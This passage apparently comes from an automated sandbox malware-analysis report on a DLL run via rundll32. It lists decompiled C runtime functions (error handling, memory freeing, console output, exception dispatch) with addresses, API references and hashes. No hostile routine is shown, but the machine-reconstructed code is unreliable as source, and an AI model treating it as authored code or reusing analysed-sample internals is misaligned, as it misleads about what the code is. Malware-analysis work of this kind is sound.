                                                      0x00000000
                                                      0x6e77f0b7
                                                      0x6e77f082
                                                      0x6e77f082
                                                      0x6e77f082
                                                      0x6e77f08b
                                                      0x6e77f090
                                                      0x6e77f091
                                                      0x6e77f091
                                                      0x00000000
                                                      0x6e77f096
                                                      0x6e77f080
                                                      0x6e77f046
                                                      0x6e77f04c
                                                      0x6e77f04e
                                                      0x6e77f050
                                                      0x6e77f05d
                                                      0x00000000
                                                      0x6e77f052
                                                      0x6e77f052
                                                      0x6e77f055
                                                      0x6e77f0cf
                                                      0x6e77f0cf
                                                      0x6e77f057
                                                      0x6e77f057
                                                      0x6e77f057
                                                      0x6e77f057
                                                      0x6e77f059
                                                      0x6e77f059
                                                      0x6e77f059
                                                      0x6e77f055
                                                      0x6e77f050
                                                      0x6e77f0d2
                                                      0x6e77f0da
                                                      0x6e77f0dc
                                                      0x6e77f0dc
                                                      0x6e77f0e3
                                                      0x6e77efb1
                                                      0x6e77f021
                                                      0x6e77f021
                                                      0x6e77f023
                                                      0x00000000
                                                      0x6e77f025
                                                      0x6e77f028
                                                      0x6e77f028
                                                      0x6e77f023
                                                      0x6e77efaf
                                                      0x6e77efaa
                                                      0x6e77ef89
                                                      0x6e77ef8e
                                                      0x6e77ef8e

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,6E77E396,00000000,00000001,6E77BC73,?,6E77E855,00000001,?,?,?,6E77BC02,?,00000000), ref: 6E77EEDD
                                                      • _free.LIBCMT ref: 6E77EF3A
                                                      • _free.LIBCMT ref: 6E77EF70
                                                      • SetLastError.KERNEL32(00000000,00000005,000000FF,?,6E77E855,00000001,?,?,?,6E77BC02,?,00000000,00000000,6E78A668,0000002C,6E77BC73), ref: 6E77EF7B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: 16463d86b63e6622a9c56030a7d35a56ae5073cf40bd82fd255fa7cb56703508
                                                      • Instruction ID: d5efccd078e72a9d2d33616d014f33830e5011f05f366e11709df2bceb610ca6
                                                      • Opcode Fuzzy Hash: 16463d86b63e6622a9c56030a7d35a56ae5073cf40bd82fd255fa7cb56703508
                                                      • Instruction Fuzzy Hash: D511E7722185056EEFB119F55E8CDDB215DCBE337D7310638F224869B0DB218C018E25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77F02F, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E77F02F(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6e78c108; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E77D934(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E77D5E9(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E77D934(__eflags,  *0x6e78c108, _t18);
							if(__eflags != 0) {
								E6E77ECDA(_t18, 0x6e78d308);
								E6E77D646(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E77D934(__eflags,  *0x6e78c108, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E77D934(0,  *0x6e78c108, 0);
							_push(0);
							L9:
							E6E77D646();
							goto L4;
						}
					}
				} else {
					_t18 = E6E77D8F5(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e78c108; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                                      0x6e77f03a
                                                      0x6e77f03c
                                                      0x6e77f041
                                                      0x6e77f044
                                                      0x6e77f062
                                                      0x6e77f065
                                                      0x6e77f06a
                                                      0x6e77f06c
                                                      0x00000000
                                                      0x6e77f06e
                                                      0x6e77f07a
                                                      0x6e77f07e
                                                      0x6e77f080
                                                      0x6e77f0a5
                                                      0x6e77f0a7
                                                      0x6e77f0c0
                                                      0x6e77f0c7
                                                      0x00000000
                                                      0x6e77f0a9
                                                      0x6e77f0a9
                                                      0x6e77f0b2
                                                      0x6e77f0b7
                                                      0x00000000
                                                      0x6e77f0b7
                                                      0x6e77f082
                                                      0x6e77f082
                                                      0x6e77f082
                                                      0x6e77f08b
                                                      0x6e77f090
                                                      0x6e77f091
                                                      0x6e77f091
                                                      0x00000000
                                                      0x6e77f096
                                                      0x6e77f080
                                                      0x6e77f046
                                                      0x6e77f04c
                                                      0x6e77f050
                                                      0x6e77f05d
                                                      0x00000000
                                                      0x6e77f052
                                                      0x6e77f055
                                                      0x6e77f0cf
                                                      0x6e77f0cf
                                                      0x6e77f057
                                                      0x6e77f057
                                                      0x6e77f057
                                                      0x6e77f059
                                                      0x6e77f059
                                                      0x6e77f059
                                                      0x6e77f055
                                                      0x6e77f050
                                                      0x6e77f0d2
                                                      0x6e77f0da
                                                      0x6e77f0e3

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000001,6E77D5A0,6E77D66C,?,?,6E77CED9), ref: 6E77F034
                                                      • _free.LIBCMT ref: 6E77F091
                                                      • _free.LIBCMT ref: 6E77F0C7
                                                      • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000001,6E77D5A0,6E77D66C,?,?,6E77CED9), ref: 6E77F0D2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: a009e9c0e405cb67efac3897d692f96eba9e468dd44ec4dd7a87d2e1e03ba059
                                                      • Instruction ID: fc0f035977f6355547cdfd46fae233ae5b9aa87efdd8e3ff76b2635294ba2147
                                                      • Opcode Fuzzy Hash: a009e9c0e405cb67efac3897d692f96eba9e468dd44ec4dd7a87d2e1e03ba059
                                                      • Instruction Fuzzy Hash: 7C11C6726086006EEF751AF96FC8DAB225D9BE3379B310634F224862F0DF618C418E25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D3C45, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(6E85594C), ref: 6E7D3C4F
                                                      • RtlLeaveCriticalSection.NTDLL(6E85594C), ref: 6E7D3C82
                                                      • SetEvent.KERNEL32(6E855968,6E79A65A,6E8688F0,6E8146A0), ref: 6E7D3D1C
                                                      • ResetEvent.KERNEL32 ref: 6E7D3D28
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                      • String ID:
                                                      • API String ID: 3553466030-0
                                                      • Opcode ID: 715d435e098395ac1f7348c6145ead0b30709f0a3faa84d704262191e27b5025
                                                      • Instruction ID: 1c9278d78094c260ca286b77f00655944932024fc574fddcdd669647c56b078e
                                                      • Opcode Fuzzy Hash: 715d435e098395ac1f7348c6145ead0b30709f0a3faa84d704262191e27b5025
                                                      • Instruction Fuzzy Hash: 2F011A35601B11DFCF55AFA8E95899937A9EB4B320B440059E90EA7710CB786C45CFD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E782788, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E782788(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e78c860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E782771();
					E6E782733();
					_t13 = WriteConsoleW( *0x6e78c860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                      0x6e7827a5
                                                      0x6e7827a9
                                                      0x6e7827b6
                                                      0x6e7827bb
                                                      0x6e7827d6
                                                      0x6e7827d6
                                                      0x6e7827dc

                                                      APIs
                                                      • WriteConsoleW.KERNEL32 ref: 6E78279F
                                                      • GetLastError.KERNEL32(?,6E7812A0,?,00000001,?,00000001,?,6E77E325,00000000,00000000,00000001,00000000,00000001,?,6E77E879,6E77BC02), ref: 6E7827AB
                                                        • Part of subcall function 6E782771: CloseHandle.KERNEL32(FFFFFFFE), ref: 6E782781
                                                      • ___initconout.LIBCMT ref: 6E7827BB
                                                        • Part of subcall function 6E782733: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 6E782746
                                                      • WriteConsoleW.KERNEL32 ref: 6E7827D0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 44013f1aa5f9776df83df78fb3d22804b8a6d74b45c7ffb69fbb98863b05e6b7
                                                      • Instruction ID: 7931942e5cbeaf0dca3c907cd02a4bd610b76d3b9cfa32de91bf57c4f14a353d
                                                      • Opcode Fuzzy Hash: 44013f1aa5f9776df83df78fb3d22804b8a6d74b45c7ffb69fbb98863b05e6b7
                                                      • Instruction Fuzzy Hash: 14F03736040558BBCF121FD6ED0CD8B3F69FF56762B114030FB499A120C73188609BD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7788F3, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 50%
                                                      			E6E7788F3(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x6e78c958;
				if(_t7 == 0) {
					LeaveCriticalSection(0x6e78c940);
					_t3 = WaitForSingleObjectEx( *0x6e78c93c, _a4, 0);
					EnterCriticalSection(0x6e78c940);
					return _t3;
				}
				 *0x6e785148(0x6e78c938, 0x6e78c940, _a4);
				return  *_t7();
			}





                                                      0x6e7788f7
                                                      0x6e7788ff
                                                      0x6e778920
                                                      0x6e778931
                                                      0x6e778938
                                                      0x00000000
                                                      0x6e778938
                                                      0x6e778910
                                                      0x00000000

                                                      APIs
                                                      • SleepConditionVariableCS.KERNEL32(?,6E778890,00000064), ref: 6E778916
                                                      • LeaveCriticalSection.KERNEL32(6E78C940,00000000,?,6E778890,00000064,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E778920
                                                      • WaitForSingleObjectEx.KERNEL32(00000000,00000000), ref: 6E778931
                                                      • EnterCriticalSection.KERNEL32(6E78C940,?,6E778890,00000064,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E778938
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 424af966bccc122d72406fb977f4a89e5bfd2c1ab4ca08d0558a50bdf10010d5
                                                      • Instruction ID: f2156ef80cb3b1e679b330627b9812bfe4ca4333fe645d77e713c7dbc5d12f5d
                                                      • Opcode Fuzzy Hash: 424af966bccc122d72406fb977f4a89e5bfd2c1ab4ca08d0558a50bdf10010d5
                                                      • Instruction Fuzzy Hash: 02E01231541924BBCE111BE5FD08A8F3F5DAF27762B2511B1F506AE62087215940DBDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77CF9E, Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E6E77CF9E(void* __eax, void* __edx) {
				void* _t4;

				_t4 = __eax + 0x6e78d308;
				asm("adc cl, al");
				if(_t4 < 0) {
					 *((intOrPtr*)(_t4 - 0x743c36ff)) =  *((intOrPtr*)(_t4 - 0x743c36ff)) + __edx;
				} else {
					return;
				}
			}




                                                      0x6e77cf9e
                                                      0x6e77cfa3
                                                      0x6e77cfa5
                                                      0x6e77d015
                                                      0x6e77cfa7
                                                      0x6e77cfa9
                                                      0x6e77cfa9

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 20d6241aed524c725db66d43e42cce3b75cb58f887302edd106c7ea1ffce1070
                                                      • Instruction ID: 74b146529ad8edec984d2adc9738a5eb9c5e3100fd3fd9a4df3cea19bf61d672
                                                      • Opcode Fuzzy Hash: 20d6241aed524c725db66d43e42cce3b75cb58f887302edd106c7ea1ffce1070
                                                      • Instruction Fuzzy Hash: 6FE092B5C04A10CBCE313FE0958C4CB3BADAB7F665391487BE7048A620E7360512AF8D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7BD8C7, Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E7BD8D3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7BD8E1
                                                        • Part of subcall function 6E7D5BA4: RaiseException.KERNEL32(?,?,6E7BD8C6,6E849074,6E798E6B,?,?,?,?,?,?,6E7BD8C6,6E849074,6E845D4C,?,6E849074), ref: 6E7D5C04
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E7BD8F3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7BD901
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 2590316965-0
                                                      • Opcode ID: 2a039ee2e3a6161134cf1490368ff7e2ec979524ff4cf383a7aec566c944386f
                                                      • Instruction ID: 6b6be362beeaed5d9f9cb78f63d1ddc92d0225e3e84d78da5126e1f98b91b228
                                                      • Opcode Fuzzy Hash: 2a039ee2e3a6161134cf1490368ff7e2ec979524ff4cf383a7aec566c944386f
                                                      • Instruction Fuzzy Hash: 24E0B679C0020CBBCB06FFE4EA8DDCD777D9E04184F804C60AA249A1A4EB71A6198AD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D01A, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77D01A() {

				E6E77D646( *0x6e78d2fc);
				 *0x6e78d2fc = 0;
				E6E77D646( *0x6e78d300);
				 *0x6e78d300 = 0;
				E6E77D646( *0x6e78d328);
				 *0x6e78d328 = 0;
				E6E77D646( *0x6e78d32c);
				 *0x6e78d32c = 0;
				return 1;
			}



                                                      0x6e77d023
                                                      0x6e77d030
                                                      0x6e77d036
                                                      0x6e77d041
                                                      0x6e77d047
                                                      0x6e77d052
                                                      0x6e77d058
                                                      0x6e77d060
                                                      0x6e77d069

                                                      APIs
                                                      • _free.LIBCMT ref: 6E77D023
                                                        • Part of subcall function 6E77D646: HeapFree.KERNEL32(00000000,00000000), ref: 6E77D65C
                                                        • Part of subcall function 6E77D646: GetLastError.KERNEL32(?,?,6E77CED9), ref: 6E77D66E
                                                      • _free.LIBCMT ref: 6E77D036
                                                      • _free.LIBCMT ref: 6E77D047
                                                      • _free.LIBCMT ref: 6E77D058
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: e25e2628e363815728590d53012e620f302e54e89b1523642094cc5d1ed36767
                                                      • Instruction ID: 1e9d3d5ee5881c9c49b402b77adcd7f944a8b33ceee81ec19e5da6de231204ff
                                                      • Opcode Fuzzy Hash: e25e2628e363815728590d53012e620f302e54e89b1523642094cc5d1ed36767
                                                      • Instruction Fuzzy Hash: 25E0BFB1C04A20DA8E316F95998C8C73A6EE7BB6A53614437F71452624D73106519FCD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F6C5F, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 97a3990eed943a2c8236d3d645d2815f28f879f40ab6f2a39e64d4624d2f2677
                                                      • Instruction ID: 8e94cb6e4b38582c2881368c5b8ccf1ba95d4954e6a076894ba68347e9801bde
                                                      • Opcode Fuzzy Hash: 97a3990eed943a2c8236d3d645d2815f28f879f40ab6f2a39e64d4624d2f2677
                                                      • Instruction Fuzzy Hash: 8291F37196414ADFDF10CEE9CA606DDBBB5FF42320F14866AD860A73A4D3309A038F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F1BCD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 6E7F1C5D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 07a54453e6711247257ee13c669ebb7e4ceff2a875fb2361b0320028e5b1cff3
                                                      • Instruction ID: d10510606984ed5c058578420d26ea921b8c417a5a31426b2d6738a6d372c47f
                                                      • Opcode Fuzzy Hash: 07a54453e6711247257ee13c669ebb7e4ceff2a875fb2361b0320028e5b1cff3
                                                      • Instruction Fuzzy Hash: 4B518EA1A1C503D6C7826BD9CE6139A3BB49B41764F204D78E4D5463FEEB35848ECF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7AE290, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Tolower
                                                      • String ID: fzn
                                                      • API String ID: 2079073131-417295303
                                                      • Opcode ID: 6858e6cdd02dc7cfa2c4fd49d7970d345d06ba61931631b626c7016e2f23caea
                                                      • Instruction ID: 5ee3d040b4f4ec1afe4a1f4565be6918bd8dbf564512403bbe11d529941de71c
                                                      • Opcode Fuzzy Hash: 6858e6cdd02dc7cfa2c4fd49d7970d345d06ba61931631b626c7016e2f23caea
                                                      • Instruction Fuzzy Hash: B051CD756083498FC745CF5CC1908AEBBE5EBC9310F944A6DFA9587321D731EC858BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77A6AA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E6E77A6AA(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E779FBB(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E779FBB(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E77971A(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E77964D(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E77A280(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E77D1AE(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                                                      0x6e77a6aa
                                                      0x6e77a6aa
                                                      0x6e77a6b1
                                                      0x6e77a6ba
                                                      0x6e77a7d9
                                                      0x6e77a6c0
                                                      0x6e77a6c0
                                                      0x6e77a6c1
                                                      0x6e77a6c2
                                                      0x6e77a6cc
                                                      0x6e77a6cf
                                                      0x6e77a6d5
                                                      0x6e77a6df
                                                      0x6e77a704
                                                      0x6e77a709
                                                      0x6e77a70e
                                                      0x6e77a7d5
                                                      0x00000000
                                                      0x6e77a7d6
                                                      0x6e77a70e
                                                      0x6e77a6df
                                                      0x6e77a714
                                                      0x6e77a717
                                                      0x6e77a71a
                                                      0x6e77a720
                                                      0x6e77a726
                                                      0x6e77a738
                                                      0x6e77a73d
                                                      0x6e77a740
                                                      0x6e77a743
                                                      0x6e77a746
                                                      0x6e77a749
                                                      0x6e77a74f
                                                      0x6e77a755
                                                      0x6e77a758
                                                      0x6e77a75b
                                                      0x6e77a76a
                                                      0x6e77a76b
                                                      0x6e77a76b
                                                      0x6e77a770
                                                      0x6e77a783
                                                      0x6e77a785
                                                      0x6e77a78a
                                                      0x6e77a795
                                                      0x6e77a797
                                                      0x6e77a799
                                                      0x6e77a7b5
                                                      0x6e77a7ba
                                                      0x6e77a7bd
                                                      0x6e77a7bd
                                                      0x6e77a795
                                                      0x6e77a78a
                                                      0x6e77a7c3
                                                      0x6e77a7c4
                                                      0x6e77a7c7
                                                      0x6e77a7ca
                                                      0x6e77a7cd
                                                      0x6e77a7d0
                                                      0x6e77a75b
                                                      0x00000000
                                                      0x6e77a74f
                                                      0x6e77a7da
                                                      0x6e77a7df
